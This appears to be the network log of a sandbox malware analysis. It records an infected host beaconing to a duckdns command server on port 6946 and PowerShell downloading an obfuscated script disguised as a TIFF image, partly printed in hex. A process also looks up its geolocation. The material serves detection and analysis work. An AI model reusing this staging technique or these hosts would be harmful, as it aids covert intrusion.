                                                                                                                                                            Dec 13, 2024 07:38:46.784059048 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.855976105 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.856081963 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.856169939 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.856384993 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.856513023 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.856800079 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.857306957 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.857422113 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.857456923 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.858349085 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.858438015 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.859261036 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.859309912 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.859339952 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.859378099 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.860305071 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.860384941 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.860423088 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.861175060 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.861269951 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.861313105 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.862117052 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.862219095 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.862253904 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.863080978 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.863234043 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.864031076 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.864074945 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.864289999 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.864993095 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.865035057 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.865149021 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.865185022 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.865946054 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.866092920 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.866137028 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.866954088 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.867084980 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.867124081 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.867856026 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.867964029 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.868006945 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.868805885 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.868913889 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.869412899 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.869779110 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.869812965 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.870800018 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.870846033 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.870940924 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.870985031 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.871704102 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.871783018 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.871824026 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.872632980 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.872750044 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.872793913 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.873568058 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.873697996 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.873742104 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.874655008 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.874717951 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.875505924 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.875550032 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.875612974 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.875648975 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.876570940 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.876651049 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.876688957 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.877434015 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.877511024 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.877547979 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.878384113 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.878534079 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.879333019 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.879489899 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.880050898 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.880310059 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.880418062 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.881237984 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.881283045 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.881323099 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.881356955 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.882179976 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.924675941 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:48.060802937 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:48.180725098 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.180749893 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.180788994 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:48.180824041 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:48.180898905 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.180973053 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.180986881 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.181024075 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:48.181090117 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.181101084 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.181119919 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.181226969 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.181235075 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.300792933 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.300806999 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.300817966 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.300915003 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.300937891 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.300949097 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.301361084 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:48.301419020 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:54.765417099 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:54.769679070 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:54.889437914 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:39:24.805339098 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:39:24.807024002 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:39:24.926853895 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:39:54.852031946 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:39:54.853348970 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:39:54.973444939 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:40:24.879266024 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:40:24.881669998 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:40:25.001904011 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:40:33.768709898 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:40:34.143584967 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:40:34.940566063 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:40:36.252949953 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:40:38.752983093 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:40:43.756115913 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:40:53.753007889 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:40:54.911292076 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:40:54.912734985 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:40:55.033586979 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:41:24.953706026 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:41:24.954950094 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:41:25.074882030 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:41:54.968530893 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:41:54.974380970 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:41:55.094192982 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Dec 13, 2024 07:38:17.711658955 CET5248953192.168.2.41.1.1.1
                                                                                                                                                            Dec 13, 2024 07:38:18.027528048 CET53524891.1.1.1192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:37.482978106 CET6500053192.168.2.41.1.1.1
                                                                                                                                                            Dec 13, 2024 07:38:37.722501040 CET53650001.1.1.1192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.283318043 CET5494553192.168.2.41.1.1.1
                                                                                                                                                            Dec 13, 2024 07:38:41.610862970 CET53549451.1.1.1192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:43.790842056 CET5248753192.168.2.41.1.1.1
                                                                                                                                                            Dec 13, 2024 07:38:43.931474924 CET53524871.1.1.1192.168.2.4
                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Dec 13, 2024 07:38:17.711658955 CET192.168.2.41.1.1.10xd2ccStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:37.482978106 CET192.168.2.41.1.1.10xec6Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:41.283318043 CET192.168.2.41.1.1.10x7eb1Standard query (0)submarrine.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:43.790842056 CET192.168.2.41.1.1.10xc558Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Dec 13, 2024 07:38:18.027528048 CET1.1.1.1192.168.2.40xd2ccNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:18.027528048 CET1.1.1.1192.168.2.40xd2ccNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:18.027528048 CET1.1.1.1192.168.2.40xd2ccNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:18.027528048 CET1.1.1.1192.168.2.40xd2ccNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:18.027528048 CET1.1.1.1192.168.2.40xd2ccNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:37.722501040 CET1.1.1.1192.168.2.40xec6No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:37.722501040 CET1.1.1.1192.168.2.40xec6No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:41.610862970 CET1.1.1.1192.168.2.40x7eb1No error (0)submarrine.duckdns.org192.3.101.149A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 13, 2024 07:38:43.931474924 CET1.1.1.1192.168.2.40xc558No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                            • res.cloudinary.com
                                                                                                                                                            • paste.ee
                                                                                                                                                            • 23.95.235.29
                                                                                                                                                            • geoplugin.net
                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.44973223.95.235.29807436C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 13, 2024 07:38:10.940186024 CET337OUTGET /90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                            Host: 23.95.235.29
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Dec 13, 2024 07:38:12.054486990 CET1236INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 13 Dec 2024 06:38:11 GMT
                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 09:33:52 GMT
                                                                                                                                                            ETag: "258ae-6290f698ce816"
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 153774
                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: image/tiff
                                                                                                                                                            Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 63 00 55 00 55 00 4f 00 57 00 55 00 76 00 7a 00 76 00 66 00 6e 00 70 00 68 00 42 00 6d 00 20 00 3d 00 20 00 22 00 57 00 78 00 51 00 65 00 4b 00 4c 00 4c 00 76 00 62 00 57 00 4e 00 62 00 76 00 51 00 6b 00 22 00 0d 00 0a 00 63 00 63 00 65 00 55 00 4a 00 6f 00 47 00 62 00 6b 00 4b 00 47 00 68 00 4c 00 6d 00 64 00 20 00 3d 00 20 00 22 00 47 00 57 00 4c 00 7a 00 4c 00 70 00 65 00 4c 00 57 00 74 00 4f 00 55 00 69 00 47 00 4b 00 22 00 0d 00 0a 00 72 00 4b 00 57 00 69 00 4b 00 50 00 4b 00 57 00 71 00 57 00 57 00 65 00 4e 00 63 00 57 00 20 00 3d 00 20 00 22 00 42 00 4b 00 63 00 4c 00 61 00 4b 00 72 00 57 00 5a 00 69 00 4b 00 68 00 57 00 41 00 70 00 22 00 0d 00 0a 00 0d 00 0a 00 61 00 6f 00 6b 00 6c 00 4c 00 71 00 64 00 4c 00 61 00 70 00 69 00 73 00 57 00 63 00 47 00 20 00 3d 00 20 00 22 00 70 00 6e 00 57 00 4c 00 6e 00 41 00 73 00 51 00 65 00 6e 00 5a 00 4a 00 6a 00 42 00 70 00 22 00 0d 00 0a 00 76 00 55 00 53 00 69 00 57 00 63 00 69 00 4b 00 53 00 6d 00 [TRUNCATED]
                                                                                                                                                            Data Ascii: cUUOWUvzvfnphBm = "WxQeKLLvbWNbvQk"cceUJoGbkKGhLmd = "GWLzLpeLWtOUiGK"rKWiKPKWqWWeNcW = "BKcLaKrWZiKhWAp"aoklLqdLapisWcG = "pnWLnAsQenZJjBp"vUSiWciKSmLBGqj = "fpbKKPmnekkLWuk"iUcAWuILKSKULuj = "rLbWiUGRonrmTUq"HcJKWkhiiKcJGGA = "GksZWveOcbLxWiR"zemLKbLAKAhWeof = "CpiWzGWdcsKNolK"xLpxiKLooLmutmh = "JthGcTLexmLWcWi"cqBaLhZUICNhKbl = "erfWKLegLBPbfUW"WqfKzhKbNeaKgLW = "xWLfWGiCGCqkcec"qKIkbptpbCWUKGu = "uhmPactnWSWHGGW"RzmRvL
                                                                                                                                                            Dec 13, 2024 07:38:12.054517984 CET1236INData Raw: 00 4c 00 4f 00 4b 00 47 00 4a 00 61 00 78 00 57 00 57 00 20 00 3d 00 20 00 22 00 75 00 63 00 61 00 7a 00 42 00 65 00 6c 00 6f 00 5a 00 6f 00 68 00 64 00 4b 00 63 00 7a 00 22 00 0d 00 0a 00 4c 00 6e 00 47 00 4e 00 55 00 5a 00 54 00 6d 00 4c 00 47
                                                                                                                                                            Data Ascii: LOKGJaxWW = "ucazBeloZohdKcz"LnGNUZTmLGciuvn = "cTRLzGcNNpdrfio"BtguLLxLcapQZuo = "WkinlUGLLxggOUo"RpthLviWpWQLWB
                                                                                                                                                            Dec 13, 2024 07:38:12.054534912 CET1236INData Raw: 00 69 00 7a 00 76 00 47 00 57 00 70 00 22 00 0d 00 0a 00 4c 00 57 00 70 00 66 00 4c 00 70 00 72 00 69 00 57 00 48 00 6e 00 47 00 6b 00 4c 00 6b 00 20 00 3d 00 20 00 22 00 65 00 6d 00 4c 00 63 00 52 00 7a 00 7a 00 65 00 4c 00 69 00 47 00 4e 00 4e
                                                                                                                                                            Data Ascii: izvGWp"LWpfLpriWHnGkLk = "emLcRzzeLiGNNcm"KQmcNGqIAAxkWie = "bkLLqkkWekKTbic"lhdLqccGpehmWLL = "hBtvBiqincoULAP"W
                                                                                                                                                            Dec 13, 2024 07:38:12.054692030 CET1236INData Raw: 00 51 00 49 00 20 00 3d 00 20 00 22 00 55 00 4c 00 7a 00 72 00 63 00 69 00 4b 00 78 00 4b 00 63 00 6c 00 55 00 4c 00 68 00 6f 00 22 00 0d 00 0a 00 6d 00 54 00 54 00 68 00 69 00 4c 00 54 00 62 00 55 00 6f 00 69 00 4c 00 63 00 42 00 6f 00 20 00 3d
                                                                                                                                                            Data Ascii: QI = "ULzrciKxKclULho"mTThiLTbUoiLcBo = "RKGiPhbiUgcxGia"xLWKAfKNkLumWik = "ozoCueuaAOpvAPc"gQZcpBtWUxWxRti = "NWsL
                                                                                                                                                            Dec 13, 2024 07:38:12.054708958 CET1236INData Raw: 00 78 00 69 00 6d 00 4b 00 66 00 69 00 6d 00 63 00 69 00 4f 00 4c 00 6c 00 47 00 72 00 65 00 20 00 3d 00 20 00 22 00 4a 00 61 00 67 00 50 00 69 00 6b 00 6f 00 43 00 6b 00 4f 00 74 00 50 00 68 00 62 00 61 00 22 00 0d 00 0a 00 69 00 41 00 57 00 65
                                                                                                                                                            Data Ascii: ximKfimciOLlGre = "JagPikoCkOtPhba"iAWeexoiidbHzUL = "iLlaPupKtWKKArL"faRZojLlSWhexKW = "hhcWlcvlkakKcmO"NJlQLpUj
                                                                                                                                                            Dec 13, 2024 07:38:12.054723978 CET1236INData Raw: 00 4f 00 78 00 53 00 4e 00 41 00 6e 00 6f 00 57 00 5a 00 47 00 69 00 4c 00 22 00 0d 00 0a 00 65 00 62 00 54 00 41 00 63 00 55 00 6c 00 4c 00 7a 00 6e 00 55 00 57 00 47 00 6f 00 4b 00 20 00 3d 00 20 00 22 00 41 00 6b 00 65 00 63 00 66 00 4e 00 4c
                                                                                                                                                            Data Ascii: OxSNAnoWZGiL"ebTAcUlLznUWGoK = "AkecfNLeoZezGrf"AbhWLLzHSmmBsbx = "GkiKKLLGWAlrLiv"eBAzoGalixlPbAi = "ibRKhGhUUlkeG
                                                                                                                                                            Dec 13, 2024 07:38:12.054740906 CET1236INData Raw: 00 71 00 6e 00 4b 00 52 00 4b 00 57 00 4c 00 6b 00 20 00 3d 00 20 00 22 00 69 00 6f 00 63 00 54 00 6f 00 75 00 4a 00 6c 00 68 00 4c 00 4c 00 4e 00 42 00 4e 00 4c 00 22 00 0d 00 0a 00 48 00 62 00 47 00 4b 00 41 00 41 00 43 00 4c 00 4b 00 62 00 68
                                                                                                                                                            Data Ascii: qnKRKWLk = "iocTouJlhLLNBNL"HbGKAACLKbhOrii = "xppTLaRLuLUkxnZ"mAQpjTWhOehGnos = "OfKsZGiLuKKlWOe"RaacNTTJKnWpcUf =
                                                                                                                                                            Dec 13, 2024 07:38:12.055026054 CET1236INData Raw: 00 6e 00 7a 00 63 00 22 00 0d 00 0a 00 41 00 55 00 6f 00 70 00 6a 00 4f 00 57 00 6d 00 52 00 4c 00 63 00 4a 00 4e 00 6b 00 69 00 20 00 3d 00 20 00 22 00 4e 00 66 00 57 00 6b 00 43 00 4c 00 41 00 42 00 65 00 41 00 6f 00 4c 00 63 00 6c 00 69 00 22
                                                                                                                                                            Data Ascii: nzc"AUopjOWmRLcJNki = "NfWkCLABeAoLcli"bzmgRpAbZzNLkWG = "KWiOaUWmjKCLqgf"PKAmaWLLrGCeUtG = "eAPGzuUkbRvABLu"mO
                                                                                                                                                            Dec 13, 2024 07:38:12.055042028 CET1236INData Raw: 00 3d 00 20 00 22 00 57 00 76 00 62 00 42 00 66 00 74 00 57 00 57 00 51 00 6e 00 47 00 71 00 6f 00 4f 00 50 00 22 00 0d 00 0a 00 52 00 66 00 43 00 78 00 69 00 70 00 6d 00 42 00 72 00 4c 00 63 00 6f 00 55 00 6e 00 63 00 20 00 3d 00 20 00 22 00 47
                                                                                                                                                            Data Ascii: = "WvbBftWWQnGqoOP"RfCxipmBrLcoUnc = "GdehepPaULNRWSK"LLcLhzoKNKBLmUL = "UffWWAtROBiCGiK"lfUhihfeqoGeoff = "TkLiJaj
                                                                                                                                                            Dec 13, 2024 07:38:12.055058956 CET1236INData Raw: 00 54 00 4f 00 4e 00 69 00 5a 00 4b 00 62 00 6d 00 6d 00 57 00 62 00 4c 00 71 00 5a 00 20 00 3d 00 20 00 22 00 4c 00 66 00 4c 00 48 00 75 00 4f 00 42 00 6a 00 63 00 6c 00 6b 00 69 00 47 00 75 00 6f 00 22 00 0d 00 0a 00 6c 00 5a 00 57 00 47 00 43
                                                                                                                                                            Data Ascii: TONiZKbmmWbLqZ = "LfLHuOBjclkiGuo"lZWGCiWrifUBWrW = "sCcBLnuZfiGZbLT"tiOKpKBGKKUieKi = "ppCuCKSGLlKCabc"PPbUNjneppJ
                                                                                                                                                            Dec 13, 2024 07:38:12.174752951 CET1236INData Raw: 00 75 00 57 00 6c 00 66 00 6f 00 68 00 4c 00 4e 00 63 00 22 00 0d 00 0a 00 63 00 74 00 64 00 57 00 6c 00 50 00 6b 00 50 00 57 00 41 00 61 00 7a 00 4f 00 6b 00 49 00 20 00 3d 00 20 00 22 00 70 00 48 00 70 00 42 00 50 00 74 00 4c 00 41 00 57 00 57
                                                                                                                                                            Data Ascii: uWlfohLNc"ctdWlPkPWAazOkI = "pHpBPtLAWWmWdnm"fLZzUpLvutUqPdb = "biuqHOWrzBKfLtp"mkAHeKALkIKQWKS = "AovctLgHsuAmAl


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.449743178.237.33.50808136C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 13, 2024 07:38:44.058849096 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                            Host: geoplugin.net
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Dec 13, 2024 07:38:45.295350075 CET1171INHTTP/1.1 200 OK
                                                                                                                                                            date: Fri, 13 Dec 2024 06:38:45 GMT
                                                                                                                                                            server: Apache
                                                                                                                                                            content-length: 963
                                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                                            cache-control: public, max-age=300
                                                                                                                                                            access-control-allow-origin: *
